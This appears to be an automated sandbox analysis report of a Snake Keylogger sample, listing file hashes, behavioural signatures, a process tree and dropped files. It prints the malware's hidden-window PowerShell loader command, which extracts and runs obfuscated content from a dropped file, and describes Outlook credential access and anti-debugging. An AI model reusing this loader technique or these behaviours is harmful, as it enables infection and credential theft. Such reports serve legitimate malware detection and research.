Analysis

  • max time kernel
    146s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2024 20:19

General

  • Target

    eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe

  • Size

    762KB

  • MD5

    4398a15085a3837ef2ef6a7b056643c6

  • SHA1

    d15e71d5e8e9b750d429c7602d98e7203c24543b

  • SHA256

    eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995

  • SHA512

    34b5b0b7299c325a525675c8a0cc9e4cd6ce724866530bba7933c783c87d73f477297e8d865af6836926e5cf579292f4ce385f2c2c8ce89f916199d048a8dafe

  • SSDEEP

    12288:8PG/hGy3E/kipG6IhwYz0BWIbyuwQL3OWntl81tTTZ/Oi5DwFyEionDud:QGhbYpGjhwYzO5yRQLvf81BV2m6ionDE

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 2 IoCs
  • Snakekeylogger family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe
    "C:\Users\Admin\AppData\Local\Temp\eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3604
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Notifiers73=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\Stragglier\Citicorp.Amf';$Superscribing=$Notifiers73.SubString(53509,3);.$Superscribing($Notifiers73)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3188
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:116

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Stragglier\Citicorp.Amf

    Filesize

    52KB

    MD5

    50a86de35927f45ce009f37494068b0d

    SHA1

    880c888d5e156d7080395c964614872fe42ac89d

    SHA256

    ff7d67d9d4613f0716febf78a0e813953862c77bb5f084eebf881ac02809984b

    SHA512

    230f60733ee595111e91b0bb9c99a5a4c72b5ebfb1b77ff544b5aadeff5179fccfcd473fa8caa290798d6558f753663d21f966a6db9b2193d15e81adef6159d6

  • C:\Users\Admin\AppData\Local\Temp\Stragglier\Gudsbevis.Can

    Filesize

    303KB

    MD5

    9a6846335f888bd98b7a3439944f4861

    SHA1

    6a560953e0c1a73e0c7ad8b70787337fc77c44c9

    SHA256

    25d465d3c7065ed206fc060a68aafb67ca1c7458ab59aa027c4d5b3882ddd0e8

    SHA512

    9da8b9c39564b62250fb3db160ec4605deb7d384813953f3ecf63586f065704528e54d47d09fe7e962650112188e3b4fb7d5cf33f620d3ec84510bc94fef15ff

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olznowyx.0e5.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/116-76-0x0000000001860000-0x0000000002BD1000-memory.dmp

    Filesize

    19.4MB

  • memory/116-89-0x0000000000600000-0x0000000001854000-memory.dmp

    Filesize

    18.3MB

  • memory/116-98-0x0000000020DC0000-0x0000000020DCA000-memory.dmp

    Filesize

    40KB

  • memory/116-97-0x0000000021010000-0x00000000210A2000-memory.dmp

    Filesize

    584KB

  • memory/116-96-0x0000000021720000-0x00000000218E2000-memory.dmp

    Filesize

    1.8MB

  • memory/116-95-0x0000000020F20000-0x0000000020F70000-memory.dmp

    Filesize

    320KB

  • memory/116-93-0x0000000020A80000-0x0000000020B1C000-memory.dmp

    Filesize

    624KB

  • memory/116-92-0x0000000000600000-0x0000000000626000-memory.dmp

    Filesize

    152KB

  • memory/116-91-0x0000000000600000-0x0000000001854000-memory.dmp

    Filesize

    18.3MB

  • memory/116-90-0x0000000001860000-0x0000000002BD1000-memory.dmp

    Filesize

    19.4MB

  • memory/3188-41-0x0000000070810000-0x000000007085C000-memory.dmp

    Filesize

    304KB

  • memory/3188-60-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-33-0x00000000060C0000-0x000000000610C000-memory.dmp

    Filesize

    304KB

  • memory/3188-34-0x00000000065F0000-0x0000000006686000-memory.dmp

    Filesize

    600KB

  • memory/3188-35-0x00000000065B0000-0x00000000065CA000-memory.dmp

    Filesize

    104KB

  • memory/3188-36-0x0000000007070000-0x0000000007092000-memory.dmp

    Filesize

    136KB

  • memory/3188-37-0x0000000007650000-0x0000000007BF4000-memory.dmp

    Filesize

    5.6MB

  • memory/3188-39-0x0000000008280000-0x00000000088FA000-memory.dmp

    Filesize

    6.5MB

  • memory/3188-40-0x00000000074C0000-0x00000000074F2000-memory.dmp

    Filesize

    200KB

  • memory/3188-42-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-43-0x0000000070C10000-0x0000000070F64000-memory.dmp

    Filesize

    3.3MB

  • memory/3188-53-0x0000000007500000-0x000000000751E000-memory.dmp

    Filesize

    120KB

  • memory/3188-54-0x0000000007530000-0x00000000075D3000-memory.dmp

    Filesize

    652KB

  • memory/3188-31-0x0000000005AA0000-0x0000000005DF4000-memory.dmp

    Filesize

    3.3MB

  • memory/3188-55-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-56-0x0000000007630000-0x000000000763A000-memory.dmp

    Filesize

    40KB

  • memory/3188-58-0x0000000007DA0000-0x0000000007DC4000-memory.dmp

    Filesize

    144KB

  • memory/3188-57-0x0000000007D70000-0x0000000007D9A000-memory.dmp

    Filesize

    168KB

  • memory/3188-59-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-32-0x0000000006080000-0x000000000609E000-memory.dmp

    Filesize

    120KB

  • memory/3188-63-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-62-0x000000007439E000-0x000000007439F000-memory.dmp

    Filesize

    4KB

  • memory/3188-64-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-66-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-67-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-69-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-68-0x0000000008900000-0x0000000009C71000-memory.dmp

    Filesize

    19.4MB

  • memory/3188-70-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-71-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-73-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-21-0x0000000005A30000-0x0000000005A96000-memory.dmp

    Filesize

    408KB

  • memory/3188-20-0x00000000059C0000-0x0000000005A26000-memory.dmp

    Filesize

    408KB

  • memory/3188-19-0x00000000051C0000-0x00000000051E2000-memory.dmp

    Filesize

    136KB

  • memory/3188-18-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-16-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-17-0x0000000005220000-0x0000000005848000-memory.dmp

    Filesize

    6.2MB

  • memory/3188-15-0x0000000002AE0000-0x0000000002B16000-memory.dmp

    Filesize

    216KB

  • memory/3188-14-0x000000007439E000-0x000000007439F000-memory.dmp

    Filesize

    4KB

  • memory/3188-74-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB

  • memory/3188-75-0x0000000074390000-0x0000000074B40000-memory.dmp

    Filesize

    7.7MB